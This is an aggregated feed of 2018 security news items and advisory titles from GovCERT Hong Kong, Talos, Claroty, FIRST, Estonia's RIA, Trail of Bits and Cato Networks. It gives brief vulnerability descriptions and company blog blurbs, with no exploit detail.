https://ria.ee/uudised/uus-id-kaardi-rakendus-digidoc-4-jouab-arvutitesse
Security Alert (A18-07-01): Multiple Vulnerabilities in VMware Products
2018-07-03T04:00:00Z | 1530590400

VMware has published a security advisory to address vulnerabilities found in VMware vSphere ESXi, VMware Workstation and VMWare Fusion.

https://www.govcert.gov.hk/en/alerts_detail.php
IBM AIX rmsock SetUID Binary Information Leak
2018-07-03T00:00:00Z | 1530576000

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0624
Trail of Bits donates $100,000 to support young researchers through SummerCon
2018-06-29T11:50:15Z | 1530273015

We have a soft spot in our hearts for SummerCon. This event, the longest-running hacker conference in the US, is a great chance to host hacker friends from around the world in NYC, catch up in person, and learn about delightfully weird security topics. It draws a great crowd, ranging from “hackers to feds to […]

https://blog.trailofbits.com/2018/06/29/trail-of-bits-donates-100000-to-support-young-researchers-through-summercon/
CERT-EE seiremeeskond on kolm aastat ööpäev läbi Eesti küberruumi jälginud
2018-06-29T04:00:50Z | 1530244850

RIA küberturvalisuse teenistuse intsidentide käsitlemise osakonna (CERT-EE) ööpäevaringne mehitatud seire sai alguse 29. juunil 2015. Sellest päevast alates on Eestis paranenud küberintsidentide avastamise, ennetamise ja lahendamise kiirus.

https://ria.ee/uudised/cert-ee-seiremeeskond-kolm-aastat-oopaev-labi-eesti-kuberruumi-jalginud
High Threat Security Alert (A18-06-10): Vulnerability in Cisco Products
2018-06-29T04:00:00Z | 1530244800

Cisco released a security advisory to address the vulnerability in the web interface of the Cisco ASA. Researchers report that exploitations of the vulnerability are observed.

https://www.govcert.gov.hk/en/alerts_detail.php
Pühapäeval muutub ID-kaardi abiliini number
2018-06-28T04:20:50Z | 1530159650

1. juulil hakkab ID-kaardi kasutajatuge pakkuma aktsiaselts Tieto Estonia. Abiliini uus number on 666 8888 ja helistamisel kehtib tavapärane lauatelefonile helistamise hind. Kõnedele vastatakse tööpäeviti kella 8–19ni.

https://ria.ee/uudised/puhapaeval-muutub-id-kaardi-abiliini-number
VMware Workstation 14 Shader Functionality Denial Of Service
2018-06-28T00:00:00Z | 1530144000

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0540
Announcing the Trail of Bits osquery support group
2018-06-27T11:50:53Z | 1530100253

As great as it is, osquery could be a whole lot better. (Think write access for extensions, triggered responses upon detection, and even better performance, reliability and ease of use.) Facebook’s small osquery team can’t respond to every request for enhancement. That’s understandable. They have their hands full with managing the osquery community, reviewing PRs, […]

https://blog.trailofbits.com/2018/06/27/announcing-the-trail-of-bits-osquery-support-group/
The Evolution of SD-WAN
2018-06-27T10:29:48Z | 1530095388

The cloud has become an inseparable part of the IT enterprise as more applications make the transition to the cloud. Adaptations in WAN infrastructure that arise are necessary to meet the new and shifting IT landscape. Initially, SD-WAN was driven by the need for cost-saving since WAN infrastructure, MPLS, in particular, can be quite expensive.... The post The Evolution of SD-WAN appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-evolution-of-sd-wan/
Security Alert (A18-06-09): Multiple Vulnerabilities in Firefox
2018-06-27T04:00:00Z | 1530072000

Mozilla has published security advisories to address multiple vulnerabilities found in Firefox.

https://www.govcert.gov.hk/en/alerts_detail.php
Top SD-WAN Events to Attend in 2018 and 2019
2018-06-25T07:16:00Z | 1529910960

Software Defined Wide Area Networking (SD-WAN) has become a runaway success across all industry sectors. Analysts at IDC have estimated the SD-WAN gold rush will increase with a compounded annual growth rate (CAGR) of almost 70 percent by 2021. Rapid adoption of a new methodology comes about for one reason — it works. As a... The post Top SD-WAN Events to Attend in 2018 and 2019 appeared first on Cato Networks.

https://www.catonetworks.com/blog/top-sd-wan-events-to-attend-in-2018/
FIRST Releases Training to Help Companies Respond to Product Vulnerabilities
2018-06-21T20:00:00Z | 1529611200

The Forum of Incident Security Response Teams, Inc. (FIRST) is pleased to release the final Product Security Incident Response Teams (PSIRT) Services Framework (PDF) and accompanying training video course. This framework and training video course were developed by a global team of PSIRT practitioners from FIRST members and relevant subject matter experts.

https://www.first.org/newsroom/releases/20180621
Security Alert (A18-06-08): Multiple Vulnerabilities in Cisco Products (June 2018)
2018-06-21T04:00:00Z | 1529553600

Cisco has released 24 security advisories fixing a number of vulnerabilities in Cisco FXOS and NX-OS software.

https://www.govcert.gov.hk/en/alerts_detail.php
We Are Akamai: What Led Us Here
2018-06-21T04:00:00Z | 1529553600

About Akamai and the blog We are the people at the heart of the internet. Every day, we work together to protect our customers, deliver ultimate experiences in the digital world, and connect people from far corners of the planet....

https://www.akamai.com/blog/culture/we-are-akamai-what-led-us-here
FIRST releases 2017-2018 Annual Report
2018-06-19T13:00:00Z | 1529413200

The Forum of Incident Response and Security Teams releases its second annual report, covering the scope of its activities from the 2017 conference in Puerto Rico, through its 2018 annual event in Kuala Lumpur.

https://www.first.org/newsroom/releases/20180619
Perearstid saavad tasuta platvormi küberteadmiste arendamiseks
2018-06-19T11:58:03Z | 1529409483

Juulis saavad perearstid hakata kasutama Digitesti e-õppekeskkonda ja testida oma küberteadmisi. Sama kursuse on läbinud juba tuhanded Eesti riigiametnikud.

https://ria.ee/uudised/perearstid-saavad-tasuta-platvormi-kuberteadmiste-arendamiseks
WAN Optimization in the SD-WAN Era
2018-06-19T07:54:35Z | 1529394875

WAN optimization has been with us for a long time. Born alongside the expensive MPLS data service, WAN optimization appliances allowed organizations to squeeze more bandwidth out of thin pipes through compression and deduplication, as well as prioritizing traffic of loss-sensitive applications such as remote desktops. The dramatic changes in network traffic patterns, from inwards... The post WAN Optimization in the SD-WAN Era appeared first on Cato Networks.

https://www.catonetworks.com/blog/wan-optimization-in-the-sd-wan-era/
Insteon Hub PubNub Firmware Upgrade Confusion Permanent Denial Of Service Vulnerability
2018-06-19T00:00:00Z | 1529366400

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0513
Insteon Hub MPFS Upload Firmware Update Vulnerability
2018-06-19T00:00:00Z | 1529366400

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0511
Insteon Hub PubNub "ad" Channel Message Handler Code Execution Vulnerability
2018-06-19T00:00:00Z | 1529366400

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0496
Insteon Hub PubNub control Channel Message Handler Code Execution Vulnerabilities
2018-06-19T00:00:00Z | 1529366400

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0502
Insteon Hub HTTPExecuteGet Firmware Update host Parameter Buffer Overflow Vulnerability
2018-06-19T00:00:00Z | 1529366400

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0494
Insteon Hub PubNub "cc" Channel Message Handler Multiple Global Overflow Code Execution Vulnerabilities
2018-06-19T00:00:00Z | 1529366400

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0484
Insteon Hub HTTPExecuteGet Firmware Update Information Leak Vulnerability
2018-06-19T00:00:00Z | 1529366400

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0492
Insteon Hub HTTPExecuteGet Parameters Extraction Code Execution Vulnerability
2018-06-19T00:00:00Z | 1529366400

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0495
Insteon Hub PubNub Firmware Downgrade Vulnerability
2018-06-19T00:00:00Z | 1529366400

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0512
Insteon Hub Reboot Task Denial Of Service Vulnerability
2018-06-19T00:00:00Z | 1529366400

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0485
Insteon Hub PubNub "cc" Channel Message Handler Multiple Stack Overflow Code Execution Vulnerabilities
2018-06-19T00:00:00Z | 1529366400

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0483
Insteon Hub HTTPExecuteGet Firmware Update URL Parameter Code Execution Vulnerability
2018-06-19T00:00:00Z | 1529366400

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0493
FIRST receives grant for cyber security capacity building in the Pacific Island region
2018-06-18T18:00:00Z | 1529344800

Australian Department of Foreign Affairs and Trade (DFAT) issues a grant to FIRST to develop training and an event focused on incident response capacity building in the Pacific

https://www.first.org/newsroom/releases/20180618
Ensuring High Uptime with SD-WAN
2018-06-17T07:59:34Z | 1529222374

Branch offices come in many sizes and purposes – from small to large, and from critical functions to a simple home office. The enterprise needs a network that can adapt, offering availability levels to meet each type of office requirements. What are your options? MPLS networks have been the backbone of enterprise networks for years.... The post Ensuring High Uptime with SD-WAN appeared first on Cato Networks.

https://www.catonetworks.com/blog/ensuring-high-uptime-with-sd-wan/
Pixar Renderman IT Display Service 0x69 Command Denial-of-Service Vulnerability
2018-06-14T00:00:00Z | 1528934400

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0524
Pixar Renderman IT Display Service 0x67 Command Denial of Service Vulnerability
2018-06-14T00:00:00Z | 1528934400

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0523
Security Alert (A18-06-07): Multiple Vulnerabilities in Microsoft Products (June 2018)
2018-06-13T04:00:00Z | 1528862400

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components and enhancing the security as a defense in depth measure.

https://www.govcert.gov.hk/en/alerts_detail.php
Microsoft wimgapi LoadIntegrityInfo Code Execution Vulnerability
2018-06-12T00:00:00Z | 1528761600

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0545
QueryCon 2018: our talks and takeaways
2018-06-08T11:50:05Z | 1528458605

Sometimes a conference just gets it right. Good talks, single track, select engaged attendees, and no sales talks. It’s a recipe for success that Kolide got right on its very first try with QueryCon, the first-ever osquery conference. It’s no secret that we are huge fans of osquery, Facebook’s award-winning open source endpoint detection tool. […]

https://blog.trailofbits.com/2018/06/08/querycon-2018-our-talks-and-takeaways/
High Threat Security Alert (A18-06-05): Multiple Vulnerabilities in Adobe Flash Player
2018-06-08T04:00:00Z | 1528430400

Adobe and Microsoft have published security advisories about vulnerabilities found in the Adobe Flash Player. Reports indicate that one of the vulnerabilities is being exploited in the wild against Windows users.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A18-06-06): Multiple Vulnerabilities in Synology Drive
2018-06-08T04:00:00Z | 1528430400

Multiple vulnerabilities were found in the Synology Drive, which is a file management solution to unify multiple file portals on Synology Network Attached Storage (NAS) by synchronizing files across various desktop and mobile platforms.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A18-06-02): Multiple Vulnerabilities in Cisco IOS
2018-06-07T04:00:00Z | 1528344000

Cisco has released a security advisory fixing a vulnerability in several Cisco products.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A18-06-03): Vulnerability in Firefox
2018-06-07T04:00:00Z | 1528344000

Mozilla has published a security advisory to address a vulnerability found in Firefox.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A18-06-04): Multiple Vulnerabilities in Android
2018-06-07T04:00:00Z | 1528344000

Google has released security patch levels of 2018-06-01 and 2018-06-05 to fix 56 vulnerabilities identified in various Android devices.

https://www.govcert.gov.hk/en/alerts_detail.php
FIRST to hold its 30th Conference in Malaysia
2018-06-06T23:00:00Z | 1528326000

This will mark the first time that the information safety organization brings the conference to Malaysia.

https://www.first.org/newsroom/releases/20180606
Six Years Since World IPv6 Launch: Entering the Majority Phases
2018-06-06T19:00:00Z | 1528311600

While we still have a ways to go before residual users of IPv4 are truly "laggards", we are at a stage where the use of IPv6 should be considered the norm.

https://www.akamai.com/blog/performance/six-years-since-world-ipv6-launch
Operation Prowli: Monetizing 40,000 Victim Machines
2018-06-06T17:20:00Z | 1528305600

Operation Prowli: Monetizing 40,000 Victim Machines

https://www.akamai.com/blog/security/operation-prowli-traffic-manipulation-cryptocurrency-mining
Networking Glossary: Top 16 Networking Terms Everyone Should Know
2018-06-06T08:03:57Z | 1528272237

The world of networking has a language of its own which is continually evolving as new technologies emerge, innovative ways of delivering network services are deployed, and global connectivity becomes increasingly essential. While the list of “must-know” terms is too long to cover in a single blog, here are some to incorporate into your vocabulary... The post Networking Glossary: Top 16 Networking Terms Everyone Should Know appeared first on Cato Networks.

https://www.catonetworks.com/blog/networking-glossary-top-16-networking-terms-everyone-should-know/
Top Security Conferences in the US
2018-06-06T07:25:11Z | 1528269911

The USA hosts a number of major cyber security conferences that are ideal for networking professionals to keep up with latest trends and meet with peers from across the globe.  Below we’ve listed the best with some ideas of what happens at each event so you can start planning your attendance for 2018. DataConnectors Seattle... The post Top Security Conferences in the US appeared first on Cato Networks.

https://www.catonetworks.com/blog/top-security-conferences-in-the-us/
What You Don’t Need from an SD-WAN Vendor
2018-06-06T06:39:01Z | 1528267141

IT organizations are becoming increasingly aware of the benefits of software-defined wide area networking (SD-WAN). According to a July 2017 report from market-research firm IDC, SD-WAN adoption is seeing “remarkable growth” as companies look to streamline their WAN infrastructure and move toward more cloud-based applications. The IDC report estimates that worldwide SD-WAN infrastructure and services... The post What You Don’t Need from an SD-WAN Vendor appeared first on Cato Networks.

https://www.catonetworks.com/blog/what-you-dont-need-from-an-sd-wan-vendor/
Ocularis Recorder VMS_VA Denial of Service Vulnerability
2018-06-05T00:00:00Z | 1528156800

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0535
CVE-2018-10601
2018-06-05T00:00:00Z | 1528156800

CWE-121: STACK-BASED BUFFER OVERFLOW The vulnerability exposes an "echo" service, in which an attacker-sent buffer to an attacker-chosen device address within the same subnet is copied to the stack with no boundary checks, hence resulting in stack overflow.

https://claroty.com/team82/disclosure-dashboard/cve-2018-10601
CVE-2018-10599
2018-06-05T00:00:00Z | 1528156800

CWE-200: INFORMATION EXPOSURE The vulnerability allows an unauthenticated attacker to read memory from an attacker-chosen device address within the same subnet.

https://claroty.com/team82/disclosure-dashboard/cve-2018-10599
CVE-2018-10597
2018-06-05T00:00:00Z | 1528156800

CWE-287: IMPROPER AUTHENTICATION The vulnerability allows an unauthenticated attacker to access memory ("write-what-where") from an attacker-chosen device address within the same subnet.

https://claroty.com/team82/disclosure-dashboard/cve-2018-10597
Security Alert (A18-06-01): Multiple Vulnerabilities in Apple iOS
2018-06-04T04:00:00Z | 1528084800

Apple has released security updates in its latest iOS version 11.4 to fix 35 vulnerabilities identified in various iOS devices.

https://www.govcert.gov.hk/en/alerts_detail.php
PPA: PPA otsusega tunnistati 1. juunil kehtetuks 12 500 turvanõuetele mittevastava ID-kaardi sertifikaadid
2018-06-02T21:00:00Z | 1527973200

Praeguseks on valminud garantiikorras 3300 ID-kaarti, mis on toimetatud teenindustesse. Inimestel, kes ei ole veel kaarti kätte saanud, on võimalik võtta alternatiivina kasutusele mobiil-ID või digi-ID.

https://ria.ee/uudised/ppa-ppa-otsusega-tunnistati-1-juunil-kehtetuks-12-500-turvanouetele-mittevastava-id-kaardi
Natus Xltek EEG NeuroWorks ItemList Traversal Denial-of-Service Vulnerability
2018-05-31T00:00:00Z | 1527724800

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0362
Natus Xltek EEG NeuroWorks Invalid KeyTree Entry Denial-of-Service Vulnerability
2018-05-31T00:00:00Z | 1527724800

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0364
Natus Xltek EEG NeuroWorks ItemList Deserialization Denial-of-Service Vulnerability
2018-05-31T00:00:00Z | 1527724800

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0354
Manage your fleet’s firewalls with osquery
2018-05-30T15:06:46Z | 1527692806

We’re releasing an extension for osquery that lets you manage the local firewalls of your fleet. Each of the three major operating systems provides a native firewall, capable of blocking incoming and outgoing access when configured. However, the interface for each of these three firewall systems are dissimilar and each requires different methods of configuration. […]

https://blog.trailofbits.com/2018/05/30/manage-your-fleets-firewalls-with-osquery/
Demystifying API Rate Limiting
2018-05-30T04:00:00Z | 1527652800

APIs are the ?digital glue? that integrates and connects infrastructure, services, devices, and users. With the proliferation of APIs in almost every organization, it?s essential to have a mechanism in place to manage and govern them. That?s why we introduced Akamai API Gateway, which makes it easier for you to add governance to your APIs.

https://www.akamai.com/blog/developers/demystifying-api-rate-limiting
Manage Santa within osquery
2018-05-29T11:50:31Z | 1527594631

We’re releasing an extension for osquery that lets you manage Google Santa without the need for a separate sync server. Google Santa is an application whitelist and blacklist system for macOS ideal for deployment across managed fleets. It uses a sync server from which daemons pull rules onto managed computers. However, the sync server provides […]

https://blog.trailofbits.com/2018/05/29/manage-santa-within-osquery/
Collect NTFS forensic information with osquery
2018-05-28T16:06:07Z | 1527523567

We’re releasing an extension for osquery that will let you dig deeper into the NTFS filesystem. It’s one more tool for incident response and data collection. But it’s also an opportunity to dispense with forensics toolkits and commercial services that offer similar capabilities. Until now, osquery has been inadequate for performing the kind of filesystem […]

https://blog.trailofbits.com/2018/05/28/collect-ntfs-forensic-information-with-osquery/
Cato Adds Threat Hunting Capabilities to Cato Cloud
2018-05-27T07:54:12Z | 1527407652

Last week, we announced new security capabilities as part of our advanced security services. Cato Threat Hunting System (CTHS) is a set of algorithms and procedures developed by Cato Research Labs that dramatically reduces the time to detect threats across enterprise networks. CTHS is not only incredibly accurate but also requires no additional infrastructure on... The post Cato Adds Threat Hunting Capabilities to Cato Cloud appeared first on Cato Networks.

https://www.catonetworks.com/blog/cato-adds-threat-hunting-capabilities-cato-cloud/
Rogue System Register Read (RSRE) – also known as Variant 3a
2018-05-24T00:00:00Z | 1527120000

Systems with microprocessors utilizing speculative execution and that perform speculative reads of system registers may allow unauthorized disclosure of system parameters to an attacker with local user access via a side-channel analysis, aka Rogue System Register Read (RSRE), Variant 3a. CVE: CVE-2018-3640 Last updated: June 4, 2018, 8 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2018-0005
Speculative Store Bypass (SSB) – also known as Variant 4
2018-05-24T00:00:00Z | 1527120000

Systems with microprocessors utilizing speculative execution and speculative execution of memory reads before the addresses of all prior memory writes are known may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis, aka Speculative Store Bypass (SSB), Variant 4. CVE: CVE-2018-3639 Last updated: June 4, 2018, 8 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2018-0004
Top 10 Network Security Conferences in Europe
2018-05-23T18:30:32Z | 1527100232

Keeping up to date with changes in cybersecurity is an ongoing process. The security landscape adapts and changes rapidly as cybercriminals find new techniques to attack enterprise networks. One of the best ways of staying up to date with the latest developments in the threat landscape is by attending industry events and conferences. Europe has... The post Top 10 Network Security Conferences in Europe appeared first on Cato Networks.

https://www.catonetworks.com/blog/top-10-network-security-conferences-in-europe/
MKM: Täna jõustus uus küberturvalisuse seadus
2018-05-23T14:25:26Z | 1527085526

Uue küberturvalisuse seaduse eesmärk on kaasajastada olemasolevaid nõudeid riigiasutustele ja ettevõtjatele. Samuti sätestatakse senisest põhjalikumad turbenõuded infosüsteemide ja andmebaaside haldamisele.

https://ria.ee/uudised/mkm-tana-joustus-uus-kuberturvalisuse-seadus
DigiDoci mobiilirakendus uuenes
2018-05-23T09:29:09Z | 1527067749

Riigi Infosüsteemi Amet on täiendanud Digidoci mobiilirakendust, mille tulemusel saab nüüdsest mugavamalt iOSi ja Androidi seadmes (nutitelefonis, tahvelarvutis või teleris) digiallkirjastatud dokumente avada ning neid ID-kaardi või mobiil-ID abil allkirjastada.

https://ria.ee/uudised/digidoci-mobiilirakendus-uuenes
Security Alert (A18-05-06): New Variants of Meltdown and Spectre Vulnerabilities in Processors
2018-05-23T04:00:00Z | 1527048000

Google Project Zero and Microsoft have recently disclosed the Rogue System Register Read (RSRE, Variant 3a) and Speculative Store Bypass (SSB, Variant 4) which are related to the previous Meltdown and Spectre vulnerabilities announced in January 2018.

https://www.govcert.gov.hk/en/alerts_detail.php
It’s Time To Break Down The Access Silos
2018-05-21T07:52:32Z | 1526889152

IT departments love their silos.  Servers operations, virtualization, app development, networking and others live in silos. However, there’s another layer of silos within those that great more granular ones.  For example, in networking, when it comes to access, companies tend to manage the various methods of access independently. This has given rise to businesses building... The post It’s Time To Break Down The Access Silos appeared first on Cato Networks.

https://www.catonetworks.com/blog/its-time-to-break-down-the-access-silos/
UCaaS: Why the Internet and Voice Is A Match Made in Hell
2018-05-21T07:30:04Z | 1526887804

Today’s business lives and depends on the Internet. More and more companies rely on the Internet for voice and video. This is particularly true as we adopt Unified Communications as a Service (UCaaS). The public Internet, though, is a challenging environment to deliver business-quality real-time services.  Aside from the general issues of packet loss and... The post UCaaS: Why the Internet and Voice Is A Match Made in Hell appeared first on Cato Networks.

https://www.catonetworks.com/blog/ucaas-why-the-internet-and-voice-is-a-match-made-in-hell/
Security Alert (A18-05-05): Multiple Vulnerabilities in ISC BIND
2018-05-21T04:00:00Z | 1526875200

Multiple vulnerabilities were found in the ISC BIND software.

https://www.govcert.gov.hk/en/alerts_detail.php
PPA vahetab välja ligi 12 500 turvanõuetele mittevastavat ID-kaarti
2018-05-16T21:00:00Z | 1526504400

Tänase seisuga on Eestis kasutusel pea 12 500 turvanõuetele mittevastavat ID-kaarti, mille sertifikaadid tunnistatakse alates 1. juunist kehtetuks.

https://ria.ee/uudised/ppa-vahetab-valja-ligi-12-500-turvanouetele-mittevastavat-id-kaarti
2018 SD-WAN Survey: What Enterprises Want From Their SD-WAN Vendor
2018-05-16T07:39:05Z | 1526456345

SD-WAN adoption is seeing rapid growth as companies look to streamline their WAN infrastructure and move toward more cloud-based applications. Much of the growth in SD-WAN adoption is from companies looking for ways to reduce the number of physical devices required to support applications as well as lower the cost of maintaining technology deployed in... The post 2018 SD-WAN Survey: What Enterprises Want From Their SD-WAN Vendor appeared first on Cato Networks.

https://www.catonetworks.com/blog/2018-sd-wan-survey-what-enterprises-want-from-their-sd-wan-vendor/
Security Alert (A18-05-04): Multiple Vulnerabilities in Adobe Reader/Acrobat
2018-05-15T04:00:00Z | 1526356800

Security updates are released for Adobe Reader/Acrobat to address multiple vulnerabilities.

https://www.govcert.gov.hk/en/alerts_detail.php
Adobe Acrobat Reader DC Net.Discovery.queryServices Remote Code Execution Vulnerability
2018-05-15T00:00:00Z | 1526342400

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0517
Adobe Acrobat Reader DC ANFancyAlertImpl Remote Code Execution Vulnerability
2018-05-15T00:00:00Z | 1526342400

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0518
SD-WAN Use Cases – Where to Start with SD-WAN
2018-05-14T10:27:53Z | 1526293673

SD-WAN is all the rage in enterprise networking these days. IT teams are excited about the opportunities SD-WAN creates to transform their networks. Scarred by slow, rigid and complex technologies, like MPLS, and complex command line interfaces, networking professionals are turning to SD-WAN to usher in an era of automated and intelligent networks. But wait.... The post SD-WAN Use Cases – Where to Start with SD-WAN appeared first on Cato Networks.

https://www.catonetworks.com/blog/sd-wan-use-cases-where-to-start-with-sd-wan/
Security Alert (A18-05-03): Multiple Vulnerabilities in Firefox
2018-05-10T04:00:00Z | 1525924800

Mozilla has published security advisories to address multiple vulnerabilities found in Firefox.

https://www.govcert.gov.hk/en/alerts_detail.php
Inside Gartner’s 10 Worst Networking Practices
2018-05-09T13:48:30Z | 1525873710

No networking team plans to become inefficient. But in the rush to solve today’s pressing problems, inefficient practices creep into many organizations. A recent Gartner research note identified the worst of these networking practices, their symptoms, and what you can do about them. We thought the report to be so informative that we’ve made it... The post Inside Gartner’s 10 Worst Networking Practices appeared first on Cato Networks.

https://www.catonetworks.com/blog/insider-gartners-10-worst-networking-practices/
High Threat Security Alert (A18-05-01): Multiple Vulnerabilities in Microsoft Products (May 2018)
2018-05-09T04:00:00Z | 1525838400

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A18-05-02): Vulnerability in Adobe Flash Player
2018-05-09T04:00:00Z | 1525838400

Adobe released a security update to address a vulnerability found in the Adobe Flash Player.

https://www.govcert.gov.hk/en/alerts_detail.php
Introducing New WhoAmI Tool DNS Resolver Information
2018-05-09T04:00:00Z | 1525838400

The Domain Name System (DNS) tools ?whoami.akamai.net? and its alias ?whoami.akamai.com? have been used for many years, often as a step in the process for diagnosing how a content delivery network (CDN) is directing traffic, locality, and network reachability issues. Whoami was originally introduced as a quick solution that, as often happens, ended up sticking around for far longer than expected.

https://www.akamai.com/blog/developers/introducing-new-whoami-tool-dns-resolver-information
Hacking a Massive Steam Scamming and Phishing Operation for Fun and Profit
2018-05-09T00:00:00Z | 1525824000

When I'm not doing bug bounty or studying for school I'll often be playing Counter-Strike: Global Offensive or PLAYERUNKNOWN'S BATTLEGROUNDS. Both of these games are awesome and really fun to play, but something interesting about them is that their tradable in-game items are very valuable. Due to the high prices of items and often underage inexperienced players, these communities are ripe for scamming and fraud.

https://samcurry.net/hacking-a-massive-steam-scamming-and-phishing-operation-for-fun-and-profit
ID-kaardi konverents toob Tallinna teadlased ja eksperdid üle maailma
2018-05-08T21:00:00Z | 1525813200

Täna korraldab Riigi Infosüsteemi Amet (RIA) rahvusvahelise ID-kaardi õppetundide konverentsi „The Lessons We Learned“, et arutleda nõrkusest puudutatud riikide ja asutuste kogemuste ning vastutuse üle. Konverentsi üks peaesinejatest on ID-kaardi turvariski avastanud Tšehhi Masaryki ülikooli teadlane Petr Švenda.

https://ria.ee/uudised/id-kaardi-konverents-toob-tallinna-teadlased-ja-eksperdid-ule-maailma
Riigikogu võttis vastu küberturvalisuse seaduse
2018-05-08T21:00:00Z | 1525813200

Riigikogu võttis tänasel istungil 79 poolthäälega vastu küberturvalisuse seaduse, mille eesmärk on tugevdada ühiskonna jaoks määrava tähtsusega teenuste osutamisel ning riigi ja kohaliku omavalitsuse üksuste võrgu- ja infosüsteemide kaitset.

https://ria.ee/uudised/riigikogu-vottis-vastu-kuberturvalisuse-seaduse
Multi-Master Replication Manager for MySQL mmm_agentd Remote Command Injection Vulnerabilities
2018-05-07T00:00:00Z | 1525651200

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0501
SD-WAN and Cloud Security
2018-05-06T11:05:33Z | 1525604733

Cloud computing has been an integral part of the modern enterprise for some time. No longer an emerging technology, cloud computing is now used in everything from applications, storage, and networking. With vendors like Amazon AWS and applications like Office 365, the cloud computing market is projected to reach $411B by 2020. Gartner predicts that... The post SD-WAN and Cloud Security appeared first on Cato Networks.

https://www.catonetworks.com/blog/sd-wan-and-cloud-security/
State Machine Testing with Echidna
2018-05-03T10:50:48Z | 1525344648

Property-based testing is a powerful technique for verifying arbitrary properties of a program via execution on a large set of inputs, typically generated stochastically. Echidna is a library and executable I’ve been working on for applying property-based testing to EVM code (particularly code written in Solidity). Echidna is a library for generating random sequences of […]

https://blog.trailofbits.com/2018/05/03/state-machine-testing-with-echidna/
Multi-Segment Optimization: How Cato Cloud Modernizes WAN Optimization for Today’s SD-WAN
2018-04-30T14:16:40Z | 1525097800

As our networks have evolved so to have the challenges of optimizing application performance. Our new eBook,  “Cato Networks Optimized WAN and Cloud Connectivity”, analyzes those challenges and explains Cato’s unique approach to overcoming the performance limitations in today’s cloud- and mobile-centric organizations. WAN optimization was designed to overcome the limitations of MPLS-based networks. Bandwidth... The post Multi-Segment Optimization: How Cato Cloud Modernizes WAN Optimization for Today’s SD-WAN appeared first on Cato Networks.

https://www.catonetworks.com/blog/multi-segment-optimization-how-cato-cloud-modernizes-wan-optimization-for-todays-sd-wan/
High Threat Security Alert (A18-04-11): Multiple Vulnerabilities in PHP
2018-04-30T04:00:00Z | 1525060800

Multiple vulnerabilities have been found in PHP. Reports indicate that there is elevated risk of cyber attacks on vulnerable systems.

https://www.govcert.gov.hk/en/alerts_detail.php
How-To: Add Timing-Allow-Origin Header to Improve Your Website Performance Measurements
2018-04-27T13:00:00Z | 1524834000

https://www.akamai.com/blog/performance/2024/sep/improve-your-website-performance-measurements
The Business Impact of WAN Transformation with SD-WAN
2018-04-26T06:45:57Z | 1524725157

SD-WAN is one of the hottest technologies in the networking space. Being “hot”, though, doesn’t mean that SD-WAN has a solid business case to support it. How can IT executives justify the investment in this technology? In short, SD-WAN promises to have a positive business impact in the following areas: Improve network capacity, availability, and... The post The Business Impact of WAN Transformation with SD-WAN appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-business-impact-of-wan-transformation-with-sd-wan/
High Threat Security Alert (A18-04-10): Vulnerability in Drupal
2018-04-26T04:00:00Z | 1524715200

Drupal released a security update to fix a critical vulnerability (CVE-2018-7602). Multiple attack vectors could be adopted to exploit the vulnerabilities.

https://www.govcert.gov.hk/en/alerts_detail.php
Hyland Perceptive Document Filters DOCX to HTML Code Execution Vulnerability
2018-04-26T00:00:00Z | 1524700800

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0527
Hyland Perceptive Document Filters DOC to HTML updateNumbering Code Execution Vulnerability
2018-04-26T00:00:00Z | 1524700800

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0538
Hyland Perceptive Document Filters OpenDocument to JPEG conversion SkCanvas Code Execution vulnerability
2018-04-26T00:00:00Z | 1524700800

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0528
Hyland Perceptive Document Filters Microsoft Word CDATA Code Execution Vulnerability
2018-04-26T00:00:00Z | 1524700800

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0534
Security Alert (A18-04-09): Multiple Vulnerabilities in Apple iOS
2018-04-25T04:00:00Z | 1524628800

On 24 April 2018, Apple released security updates in its latest iOS version 11.3.1 to fix 4 vulnerabilities identified in various iOS devices.

https://www.govcert.gov.hk/en/alerts_detail.php
RIA esitles küberturvalisuse aastaraamatut
2018-04-24T21:00:00Z | 1524603600

RIA juht: möödunud aasta kinnitas, et digitaalse eluviisi kaitsmine nõuab infosüsteemide turvalisusesse investeerimist.

https://ria.ee/uudised/ria-esitles-kuberturvalisuse-aastaraamatut
Firewall as a Service vs UTM
2018-04-23T10:58:44Z | 1524481124

